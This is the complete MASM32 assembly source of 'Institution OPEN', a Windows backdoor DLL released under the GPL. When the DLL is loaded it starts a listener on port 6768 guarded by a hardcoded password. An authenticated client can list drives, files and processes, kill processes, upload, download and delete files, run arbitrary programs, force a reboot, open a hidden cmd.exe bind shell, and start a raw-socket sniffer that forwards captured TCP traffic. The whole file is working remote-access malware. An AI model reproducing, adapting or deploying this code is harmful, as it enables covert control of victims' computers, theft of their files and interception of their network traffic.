;Institution OPEN v0.1.2
;Copyright (C) 2002 Aphex
;
;This program is free software; you can redistribute it and/or
;modify it under the terms of the GNU General Public License
;as published by the Free Software Foundation; either version 2
;of the License, or (at your option) any later version.
;
;This program is distributed in the hope that it will be useful,
;but WITHOUT ANY WARRANTY; without even the implied warranty of
;MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
;GNU General Public License for more details.
;
;You should have received a copy of the GNU General Public License
;along with this program; if not, write to the Free Software
;Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.

.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\masm32.inc
includelib \masm32\lib\masm32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib

GetMem proto :dword
Address proto
ListDrives proto :dword
ListFiles proto :dword, :dword
ListProcesses proto :dword
ReceiveFile proto :dword, :dword, :dword
SendFile proto :dword, :dword
SnifferClient proto :dword, :word
SnifferServer proto :dword
ShellClient proto :dword
ShellServer proto :dword
Client proto :dword
Server proto
Online proto
Main proto

IOC_RCVALL equ IOC_IN or 18000000h or 1

HEADER struct
  sport word ?
  dport word ?
  seq dword ?
  ack dword ?
  len byte ?
  flags byte ?
  window word ?
  checksum word ?
  upr word ?
  contents byte 2048 dup (?)
HEADER ends

PACKET struct
  verlen byte ?
  tos byte ?
  len word ?
  id word ?
  doffset word ?
  ttl byte ?
  protocol byte ?
  checksum word ?
  saddr dword ?
  daddr dword ?
  tcp HEADER <>
PACKET ends

.data
wPort dd 6768
szPass byte '1', 31 dup (0)
szTag byte 1, 0
szWild byte '*', 0
szBack byte '\', 0
szCmd1 byte '1', 0
szCmd2 byte '2', 0
szCmd3 byte '3', 0
szCmd4 byte '4', 0
szCmd5 byte '5', 0
szCmd6 byte '6', 0
szCmd7 byte '7', 0
szCmd8 byte '8', 0
szCmd9 byte '9', 0
szCmd0 byte '0', 0
szCmdA byte 'A', 0
szCmdB byte 'B', 0
szCmdC byte 'C', 0
szReturn byte 13, 0
szPeriod byte '.', 0
szCrLf byte 13, 10, 0
szFooter byte 2, 3, 0
szAuth byte '1', 2, 3, 0
szSize byte '7', 2, 3, 0
szSend byte '8', 2, 3, 0
szPump byte 255, 2, 3, 0
szLoopBack byte '127.0.0.1', 0
szCommandLine byte 'cmd.exe', 0
szLogin byte 13, 10, 'login: ', 0
szArrow byte '->'
szColon byte ':'
szSpace byte ':', 32

.data?
WSAData WSADATA <>

.code
GetMem proc len:dword
add len, 1
xor eax, eax
.while eax == 0
  invoke GlobalAlloc, GMEM_FIXED, len
.endw
ret
GetMem endp 

Address proc
local ip[261]:byte
invoke gethostname, addr ip, 261
invoke gethostbyname, addr ip
mov eax, [eax + 12]
mov eax, [eax]
mov eax, [eax]
ret
Address endp

Online proc
local ip[261]:byte
invoke gethostname, addr ip, 261
invoke gethostbyname, addr ip
mov eax, [eax + 12]
mov eax, [eax]
mov eax, [eax]
invoke inet_ntoa, eax
invoke lstrcmpi, eax, addr szLoopBack
ret
Online endp

ListDrives proc sck:dword
local Drives[256]:byte
local Drive[32]:byte
invoke GetLogicalDriveStrings, 256, addr Drives
mov ecx, 26
.while ecx > 0
  push ecx
  invoke GetDriveType, addr Drives
  .if eax == DRIVE_FIXED
    invoke lstrcpyn, addr Drive, addr szCmd2, 2
    invoke szMultiCat, 3, addr Drive, addr szTag, addr Drives, addr szFooter
    invoke lstrlen, addr Drive
    invoke send, sck, addr Drive, eax, 0
  .endif  
  inc Drives
  pop ecx
  sub ecx, 1
.endw
ret
ListDrives endp

ListFiles proc Root:dword, sck:dword
local Search:WIN32_FIND_DATA
local Path[MAX_PATH]:byte
local FileSize[12]:byte
local Find:dword
invoke lstrlen, Root
inc eax
invoke lstrcpyn, addr Path, Root, eax
invoke lstrcat, addr Path, addr szWild
invoke FindFirstFile, addr Path, addr Search
.if eax == INVALID_HANDLE_VALUE
  ret
.endif
mov Find, eax
.while eax > 0
  mov eax, Search.dwFileAttributes
  and eax, FILE_ATTRIBUTE_DIRECTORY 
  .if eax == 0
    invoke lstrcpyn, addr Path, addr szCmd5, 2
  .else
    invoke lstrcpyn, addr Path, addr szCmd6, 2
  .endif  
  invoke dwtoa, Search.nFileSizeLow, addr FileSize
  invoke szMultiCat, 5, addr Path, addr szTag, addr Search.cFileName, addr szTag, addr FileSize, addr szFooter
  invoke lstrlen, addr Path 
  invoke send, sck, addr Path, eax, 0
  invoke FindNextFile, Find, addr Search
.endw
ret
ListFiles endp

ListProcesses proc sck:dword
local Snapshot:dword
local Process32:PROCESSENTRY32
local Process[256]:byte
local PID[12]:byte
local Threads[12]:byte
invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
mov Snapshot, eax                    
mov Process32.dwSize, SizeOf Process32
invoke Process32First, Snapshot, addr Process32
.while eax == 1
  invoke lstrcpyn, addr Process, addr szCmd3, 2
  invoke dwtoa, Process32.th32ProcessID, addr PID
  invoke dwtoa, Process32.cntThreads, addr Threads
  invoke szMultiCat, 7, addr Process, addr szTag, addr Process32.szExeFile, addr szTag, addr PID, addr szTag, addr Threads, addr szFooter
  invoke lstrlen, addr Process 
  invoke send, sck, addr Process, eax, 0
  invoke Process32Next, Snapshot, addr Process32
.endw
@@: 
invoke CloseHandle, Snapshot 
ret
ListProcesses endp

ReceiveFile proc FilePath:dword, FileSize:dword, sck:dword
local data:dword
local buffer:dword
local hFile:dword
local BytesWritten:dword
local BytesRead:dword
invoke send, sck, addr szPump, sizeof szPump, 0
.if eax == INVALID_SOCKET || eax == SOCKET_ERROR
  ret
.endif
invoke Sleep, 500
mov BytesRead, 0
invoke DeleteFile, FilePath
invoke CreateFile, FilePath, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
.if eax == INVALID_HANDLE_VALUE
  invoke CloseHandle, hFile
  ret
.endif
mov hFile, eax
invoke GetMem, 2048
mov buffer, eax
@@:
invoke recv, sck, buffer, 2048, 0
.if eax == INVALID_SOCKET || eax == SOCKET_ERROR
  jmp @F
.endif
add BytesRead, eax
mov ecx, eax
invoke WriteFile, hFile, buffer, ecx, addr BytesWritten, NULL
mov eax, FileSize
.if BytesRead >= eax
  jmp @F
.endif
jmp @B
@@:
invoke CloseHandle, hFile
invoke GlobalFree, buffer  
ret
ReceiveFile endp

SendFile proc FilePath:dword, sck:dword
local buffer:dword
local hFile:dword
local BytesRead:dword
local FileSize[16]:byte
local szFileSize[256]:byte
mov BytesRead, 0
invoke CreateFile, FilePath, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
.if eax == INVALID_HANDLE_VALUE
  invoke CloseHandle, hFile
  ret
.endif
mov hFile, eax
invoke GetFileSize, hFile, 0
mov ecx, eax
invoke dwtoa, ecx, addr FileSize
invoke lstrcpyn, addr szFileSize, addr szCmd9, 2
invoke szMultiCat, 3, addr szFileSize, addr szTag, addr FileSize, addr szFooter
invoke lstrlen, addr szFileSize
invoke send, sck, addr szFileSize, eax, 0
.if eax == INVALID_SOCKET || eax == SOCKET_ERROR
  invoke CloseHandle, hFile
  ret
.endif
invoke Sleep, 500
invoke GetMem, 2048
mov buffer, eax
.repeat
 invoke ReadFile, hFile, buffer, 2048, addr BytesRead, 0
  invoke send, sck, buffer, BytesRead, 0
  .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
    jmp @F
  .endif
.until BytesRead < 2048
@@:
invoke CloseHandle, hFile
invoke GlobalFree, buffer  
ret
SendFile endp

SnifferClient proc client:dword, clientport:word
local sck:dword
local sin:sockaddr_in
local control:dword
local data:dword
local packet:dword
local ip:PACKET
local address[16]:byte
local ssin:sockaddr_in
local buffer[MAX_PATH]:byte
local command[2]:byte
local parameters[MAX_PATH]:byte
@@:
invoke ioctlsocket, client, FIONREAD, addr data
.if eax != 0
  invoke closesocket, client
  ret
.endif  
.if data > 0
  .if data > MAX_PATH
    mov data, MAX_PATH
  .endif
  invoke recv, client, addr buffer, data, 0
  .if eax == SOCKET_ERROR || eax == INVALID_SOCKET
    invoke closesocket, client
    ret
  .endif
  invoke szMid, addr buffer, addr command, 0, 1
  dec data
  invoke szMid, addr buffer, addr parameters, 1, data
  invoke lstrcmpi, addr command, addr szCmd1
  .if eax == 0
    invoke lstrcmpi, addr parameters, addr szPass
    .if eax == 0
      jmp @F
    .else
      invoke closesocket, client
      ret
    .endif
  .else
    invoke closesocket, client
    ret
  .endif  
.endif
invoke Sleep, 1
jmp @B  
@@:
invoke closesocket, sck
invoke Sleep, 1000
invoke socket, PF_INET, SOCK_RAW, 0
.if eax == INVALID_SOCKET
  jmp @B
.endif
mov sck, eax
mov ax, AF_INET
mov sin.sin_family, ax
xor eax, eax
invoke Address
mov sin.sin_addr, eax
invoke htons, 0
mov sin.sin_port, ax
invoke bind, sck, addr sin, sizeof sockaddr_in
.if eax == INVALID_SOCKET
  jmp @B
.endif
invoke WSAIoctl, sck, IOC_RCVALL, addr control, sizeof control, 0, 0, addr data, 0, 0 
@@:
invoke ioctlsocket, sck, FIONREAD, addr data
.if data > 0
  .if data > 2088
    mov data, 2088
  .endif
  invoke RtlZeroMemory, addr ip, sizeof ip
  invoke recv, sck, addr ip, sizeof ip, 0
  .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
    jmp @F
  .endif
  .if ip.protocol == 6 
    .if data < 2088 && data > 40
      mov ax, clientport
      .if ip.tcp.sport != ax
        invoke inet_ntoa, ip.saddr
        invoke lstrcpy, addr address, eax
        invoke lstrlen, addr address
        invoke send, client, addr address, eax, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif
        invoke send, client, addr szColon, 1, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif
        mov ax, ip.tcp.sport
        cwde
        invoke htons, eax
        mov ecx, eax
        invoke dwtoa, ecx, addr address
        invoke lstrlen, addr address
        invoke send, client, addr address, eax, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif
        invoke send, client, addr szArrow, 2, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif       
        invoke inet_ntoa, ip.daddr
        invoke lstrcpy, addr address, eax
        invoke lstrlen, addr address
        invoke send, client, addr address, eax, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif
        invoke send, client, addr szColon, 1, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif
        mov ax, ip.tcp.dport
        cwde
        invoke htons, eax
        mov ecx, eax
        invoke dwtoa, ecx, addr address
        invoke lstrlen, addr address
        invoke send, client, addr address, eax, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif
        invoke send, client, addr szSpace, 2, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif       
        sub data, 40
        invoke send, client, addr ip.tcp.contents, data, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp @F
        .endif
        invoke send, client, addr szCrLf, 2, 0
      .endif
    .endif  
  .endif  
.endif
invoke Sleep, 1
jmp @B
@@:
invoke closesocket, client
invoke GlobalFree, packet
ret
SnifferClient endp

SnifferServer proc port:dword
local sck:dword
local sin:sockaddr_in
@@:
invoke closesocket, sck
invoke Sleep, 1000
invoke socket, PF_INET, SOCK_STREAM, 0
.if eax == INVALID_SOCKET
  jmp @B
.endif
mov sck, eax
mov ax, AF_INET
mov sin.sin_family, ax
xor eax, eax
mov sin.sin_addr, eax
invoke htons, port
mov sin.sin_port, ax
invoke bind, sck, addr sin, sizeof sockaddr_in
.if eax == INVALID_SOCKET
  jmp @B
.endif
@@:
invoke listen, sck, SOMAXCONN
invoke accept, sck, addr sin, 0
.if eax != INVALID_SOCKET
  mov edx, eax
  invoke SnifferClient, edx, sin.sin_port
  invoke closesocket, sck
  ret
.endif
jmp @B
ret
SnifferServer endp

ShellClient proc sck:dword
local sat:SECURITY_ATTRIBUTES 
local hiRead:dword
local hoRead:dword
local hiWrite:dword
local hoWrite:dword
local startupinfo:STARTUPINFO 
local processinfo:PROCESS_INFORMATION 
local exitcode:dword
local buffer[1024]:byte 
local bytes:dword 
local available:dword
local data:dword
local passlen:dword
local pass[64]:byte
local login[64]:byte
invoke RtlZeroMemory, addr login, 64
invoke send, sck, addr szLogin, sizeof szLogin, 0
.if eax == INVALID_SOCKET || eax == SOCKET_ERROR
  ret
.endif
invoke lstrlen, addr szPass
inc eax
mov passlen, eax
mov data, 0
.while TRUE
  invoke Sleep, 10
  invoke ioctlsocket, sck, FIONREAD, addr data
  .while data > eax
    invoke recv, sck, addr buffer, 1, 0
    .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
      ret
    .endif
    invoke lstrcat, addr login, addr buffer
    invoke lstrcmpi, addr szReturn, addr buffer
    .if eax == 0
      invoke lstrcpyn, addr pass, addr login, passlen
      invoke lstrcmpi, addr pass, addr szPass
      .if eax != 0
        jmp close
      .else
        jmp authed 
      .endif
    .endif
    mov eax, data
    dec eax
  .endw
.endw
authed:
invoke ioctlsocket, sck, FIONREAD, addr data
.if eax != 0
  jmp close
  ret
.endif 
invoke recv, sck, addr buffer, data, 0
invoke send, sck, addr szCrLf, sizeof szCrLf, 0
invoke send, sck, addr szCrLf, sizeof szCrLf, 0
mov sat.nLength, sizeof SECURITY_ATTRIBUTES 
mov sat.lpSecurityDescriptor, 0 
mov sat.bInheritHandle, TRUE 
invoke CreatePipe, addr hiRead, addr hiWrite, addr sat, 0 
invoke CreatePipe, addr hoRead, addr hoWrite, addr sat, 0 
invoke GetStartupInfo, addr startupinfo
mov startupinfo.cb, sizeof STARTUPINFO 
mov eax, hoWrite
mov startupinfo.hStdOutput, eax
mov startupinfo.hStdError, eax
mov eax, hiRead
mov startupinfo.hStdInput, eax
mov startupinfo.dwFlags, STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES 
mov startupinfo.wShowWindow, SW_HIDE 
invoke CreateProcess, 0, addr szCommandLine, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, addr startupinfo, addr processinfo
invoke CloseHandle, hoWrite
invoke CloseHandle, hiRead
.while TRUE
  invoke GetExitCodeProcess, processinfo.hProcess, addr exitcode
  .if exitcode != STILL_ACTIVE
    .break
  .endif
  invoke PeekNamedPipe, hoRead, addr buffer, 1023, addr bytes, addr available, 0
  .if bytes != 0
    .if available > 1023
      .while bytes >= 1023
        invoke ReadFile, hoRead, addr buffer, 1023, addr bytes, 0
        .if bytes != 0
          invoke send, sck, addr buffer, bytes, 0
          .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
            jmp closeall
          .endif
        .endif
      .endw  
    .else
      invoke ReadFile, hoRead, addr buffer, 1023, addr bytes, 0
      .if bytes != 0
        invoke send, sck, addr buffer, bytes, 0
        .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
          jmp closeall
        .endif
      .endif
    .endif    
  .endif  
@@:
  invoke ioctlsocket, sck, FIONREAD, addr data
  .if eax !=  0
    jmp closeall
  .endif 
  .if data > 0
    .if data > 1023
      mov ecx, 1023
    .endif  
    invoke recv, sck, addr buffer, ecx, 0
    .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
      jmp closeall
    .endif
    .if eax != 0
      mov edx, eax
      invoke WriteFile, hiWrite, addr buffer, edx, addr bytes, 0
    .endif
    .if data > 1023
      jmp @B
    .endif  
  .endif  
  invoke Sleep, 10
.endw
closeall:
invoke CloseHandle, hiWrite 
invoke CloseHandle, hoRead 
close:
invoke closesocket, sck
invoke GetExitCodeProcess, processinfo.hProcess, addr exitcode
.if exitcode == STILL_ACTIVE
  invoke TerminateProcess, processinfo.hProcess, 0
.endif
ret 
ShellClient endp

ShellServer proc port:dword
local sck:dword
local sin:sockaddr_in
@@:
invoke closesocket, sck
invoke Sleep, 1000
invoke socket, PF_INET, SOCK_STREAM, 0
.if eax == INVALID_SOCKET
  jmp @B
.endif
mov sck, eax
mov ax, AF_INET
mov sin.sin_family, ax
xor eax, eax
mov sin.sin_addr, eax
invoke htons, port
mov sin.sin_port, ax
invoke bind, sck, addr sin, sizeof sockaddr_in
.if eax == INVALID_SOCKET
  jmp @B
.endif
@@:
invoke listen, sck, SOMAXCONN
invoke accept, sck, addr sin, 0
.if eax != INVALID_SOCKET
  invoke ShellClient, eax
  invoke closesocket, sck
  ret
.endif
jmp @B
ret
ShellServer endp

Client proc sck:dword
local data:dword
local command[2]:byte
local buffer[MAX_PATH]:byte
local fname[MAX_PATH]:byte
local fsize:dword
local parameters[MAX_PATH]:byte
@@:
invoke ioctlsocket, sck, FIONREAD, addr data
.if eax != 0
  invoke closesocket, sck
  ret
.endif  
.if data > 0
  .if data > MAX_PATH
    mov data, MAX_PATH
  .endif
  invoke recv, sck, addr buffer, data, 0
  .if eax == SOCKET_ERROR || eax == INVALID_SOCKET
    invoke closesocket, sck
    ret
  .endif
  invoke szMid, addr buffer, addr command, 0, 1
  dec data
  invoke szMid, addr buffer, addr parameters, 1, data
  invoke lstrcmpi, addr command, addr szCmd1
  .if eax == 0
    invoke lstrcmpi, addr parameters, addr szPass
    .if eax == 0
      invoke send, sck, addr szAuth, 3, 0
      jmp @F
    .else
      invoke closesocket, sck
      ret
    .endif
  .else
    invoke closesocket, sck
    ret
  .endif  
.endif
jmp @B  
@@:
invoke ioctlsocket, sck, FIONREAD, addr data
.if eax != 0
  invoke closesocket, sck
  ret
.endif  
.if data > 0
  .if data > 2048
    mov data, 2048
  .endif
  invoke recv, sck, addr buffer, data, 0
  .if eax == SOCKET_ERROR || eax == INVALID_SOCKET
    invoke closesocket, sck
    ret
  .endif
  invoke szMid, addr buffer, addr command, 0, 1
  dec data
  invoke szMid, addr buffer, addr parameters, 1, data
  invoke lstrcmpi, addr command, addr szCmd2
  .if eax == 0
    invoke ListDrives, sck
  .endif  
  invoke lstrcmpi, addr command, addr szCmd3
  .if eax == 0
    invoke ListProcesses, sck
  .endif  
  invoke lstrcmpi, addr command, addr szCmd4
  .if eax == 0
    invoke atodw, addr parameters
    invoke OpenProcess, PROCESS_TERMINATE, 0, eax 
    invoke TerminateProcess, eax, 0
  .endif  
  invoke lstrcmpi, addr command, addr szCmd5
  .if eax == 0
    invoke ListFiles, addr parameters, sck
  .endif  
  invoke lstrcmpi, addr command, addr szCmd6
  .if eax == 0
    invoke lstrlen, addr parameters
    inc eax
    invoke lstrcpyn, addr fname, addr parameters, eax
    invoke send, sck, addr szSize, sizeof szSize, 0
    .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
      jmp @F
    .endif
  .endif  
  invoke lstrcmpi, addr command, addr szCmd7
  .if eax == 0
    invoke atodw, addr parameters
    mov fsize, eax
    invoke send, sck, addr szSend, sizeof szSend, 0
    .if eax == INVALID_SOCKET || eax == SOCKET_ERROR
      jmp @F
    .endif
    invoke ReceiveFile, addr fname, fsize, sck
  .endif  
  invoke lstrcmpi, addr command, addr szCmd8
  .if eax == 0
    invoke SendFile, addr parameters, sck
  .endif  
  invoke lstrcmpi, addr command, addr szCmd9
  .if eax == 0
    invoke DeleteFile, addr parameters
  .endif  
  invoke lstrcmpi, addr command, addr szCmd0
  .if eax == 0
    invoke WinExec, addr parameters, 0
  .endif    
  invoke lstrcmpi, addr command, addr szCmdA
  .if eax == 0
    invoke ExitWindowsEx, EWX_FORCE, 0  
  .endif    
  invoke lstrcmpi, addr command, addr szCmdB
  .if eax == 0
    invoke atodw, addr parameters
    mov edx, eax
    invoke CreateThread, 0, 0, addr ShellServer, edx, 0, 0
    invoke CloseHandle, eax
  .endif    
  invoke lstrcmpi, addr command, addr szCmdC
  .if eax == 0
    invoke atodw, addr parameters
    mov edx, eax
    invoke CreateThread, 0, 0, addr SnifferServer, edx, 0, 0
    invoke CloseHandle, eax
  .endif    
.endif  
invoke Sleep, 10
jmp @B
@@:
invoke closesocket, sck
ret
Client endp

Server proc
local sck:dword
local sin:sockaddr_in
@@:
invoke closesocket, sck
invoke Sleep, 1000
invoke socket, PF_INET, SOCK_STREAM, 0
.if eax == INVALID_SOCKET
  jmp @B
.endif
mov sck, eax
mov ax, AF_INET
mov sin.sin_family, ax
xor eax, eax
mov sin.sin_addr, eax
invoke htons, wPort
mov sin.sin_port, ax
invoke bind, sck, addr sin, sizeof sockaddr_in
.if eax == INVALID_SOCKET
  jmp @B
.endif
@@:
invoke listen, sck, SOMAXCONN
invoke accept, sck, addr sin, 0
.if eax != INVALID_SOCKET
  mov edx, eax
  invoke CreateThread, 0, 0, addr Client, edx, 0, 0
  invoke CloseHandle, eax
.endif
jmp @B
ret
Server endp

Main proc
invoke WSAStartup, 002h, addr WSAData
invoke Online
.while eax == 0
  invoke Sleep, 1000
  invoke Online
.endw
invoke Server
invoke WSACleanup
ret
Main endp

DllEntry proc hInstance:HINSTANCE, Reason:dword, Reserve:dword
.if Reason == DLL_PROCESS_ATTACH
  invoke CreateThread, 0, 0, addr Main, 0, 0, 0
.endif
mov eax, TRUE
ret
DllEntry endp

end DllEntry